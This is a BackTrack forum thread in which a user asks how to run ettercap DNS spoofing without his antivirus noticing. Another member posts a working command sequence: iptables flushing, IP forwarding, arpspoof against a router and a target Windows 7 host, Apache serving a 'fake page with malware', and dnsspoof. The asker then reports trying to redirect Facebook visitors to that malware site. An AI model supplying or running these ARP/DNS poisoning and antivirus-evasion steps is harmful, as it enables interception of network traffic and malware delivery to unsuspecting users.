Results 1 to 7 of 7

Thread: Dns spoofing with ettercap without alerting antivirus

Hybrid View

  1. #1
    Just burned their ISO
    Join Date
    Dec 2012
    Posts
    6

    Thumbs up Dns spoofing with ettercap without alerting antivirus

    hey guys i wanted to do some dns spoofing using ettercap. I used this command ettercap -Tqi eth0 -P dns_spoof -M ARP // // But as soon as i give this command my eset antivirus detects it and blocks it. But ass soon as i turn off the antivirus i am able to do the spoofing without any issues. So what i wanted to ask is that is there a way i can dns spoof without alerting my antivirus. I am new but willing to learn

    Thanks in advance ,
    thehobit.
    Last edited by thehobit; 01-23-2013 at 08:13 AM.

  2. #2
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: Dns spoofing with ettercap without alerting antivirus

    Quote Originally Posted by thehobit View Post
    hey guys i wanted to do some dns spoofing using ettercap. I used this command ettercap -Tqi eth0 -P dns_spoof -M ARP // // But as soon as i give this command my eset antivirus detects it and blocks it. But ass soon as i turn off the antivirus i am able to do the spoofing without any issues. So what i wanted to ask is that is there a way i can dns spoof without alerting my antivirus. I am new but willing to learn

    Thanks in advance ,
    thehobit.
    hi thehobit
    I'm no expert
    but you have some specific settings of the AV?
    because my eset (setup-heuristic) is not blocked the spoofing in my "virtual-net"?
    I only have a notice of "any security of my win7 (fully-update") of unknown origin "file-download" (if the "spooffing-redirection" contains a "file" & i press download!)
    I made a proof with ettercap only for "ARP" & dnsspoof for"spoofing-dns" & my eset don't BLOCK-redirection.....
    http://imageshack.us/f/7/spoof1.png/
    http://imageshack.us/f/28/spoof2.png/
    http://imageshack.us/f/13/spoof3.png/

  3. #3
    Just burned their ISO
    Join Date
    Dec 2012
    Posts
    6

    Default Re: Dns spoofing with ettercap without alerting antivirus

    @zimmaro thats because you have nod 32 installed on your computer and i have smart security with has an advanced firewall

  4. #4
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: Dns spoofing with ettercap without alerting antivirus

    Quote Originally Posted by thehobit View Post
    @zimmaro thats because you have nod 32 installed on your computer and i have smart security with has an advanced firewall
    @thehobit

    i've installed now esmart-security V6 fully enable!!! in win 7 fully-patched
    OK! standart ARPING is BLOCKING with a ""famous-pop-up of eset"....but.....
    i made a """""arping-reverse""""" & it's not detected!

    root@bt:~# iptables --flush #
    root@bt:~# iptables --table nat --flush #CLEAN my "iptables
    root@bt:~# iptables --delete-chain #
    root@bt:~# iptables --table nat --delete-chain #
    root@bt:~# echo '1' > /proc/sys/net/ipv4/ip_forward
    root@bt:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.6 ####/router/ /target-win7-with-eset/####
    root@bt:~# /etc/init.d/apache2 start #####locate fake page with malware###
    root@bt:~# dnsspoof -i eth0 ###spoof lan############

    http://imageshack.us/f/707/screenshotrph.png/
    bye

  5. #5
    Just burned their ISO
    Join Date
    Dec 2012
    Posts
    6

    Default Re: Dns spoofing with ettercap without alerting antivirus

    i dont understand these steps
    root@bt:~# arpspoof -i eth0 -t 192.168.1.1 192.168.1.6 ####/router/ /target-win7-with-eset/####
    root@bt:~# /etc/init.d/apache2 start #####locate fake page with malware###
    root@bt:~# dnsspoof -i eth0 ###spoof lan############

    Can u plz provide a screenshot of u using all those commands on ur backtrack terminal
    also should i type these commands just like mentioned above plz help

  6. #6
    Just burned their ISO
    Join Date
    Dec 2012
    Posts
    6

    Default Re: Dns spoofing with ettercap without alerting antivirus

    ok thank you i was able to do the attack on a virtual machine running xp sp 2 and avg internet security running without any problems. In my windows 7 eset does not detect the arp poisoning or the dns spoofing but when i go to facebook.com i am not redirected to the fake site with malware. Why is this so?

  7. #7
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: Dns spoofing with ettercap without alerting antivirus

    Clearly you are not familiar with the way this attack works or what might be triggering your AV. I recommend you document yourself on this matter before proceeding.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

Similar Threads

  1. Ettercap DNS Spoofing Not.. Spoofing
    By oxide in forum OLD Newbie Area
    Replies: 4
    Last Post: 04-02-2009, 10:39 PM
  2. DNS spoofing Ettercap
    By Argaiz in forum OLD BT3final Support
    Replies: 1
    Last Post: 07-18-2008, 12:14 PM
  3. Ettercap DNS spoofing
    By Argaiz in forum OLD BackTrack 3 Final
    Replies: 2
    Last Post: 07-18-2008, 12:07 PM
  4. DNS Spoofing with Ettercap
    By Irongeek in forum OLD Tutorials and Guides
    Replies: 5
    Last Post: 06-08-2008, 03:02 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •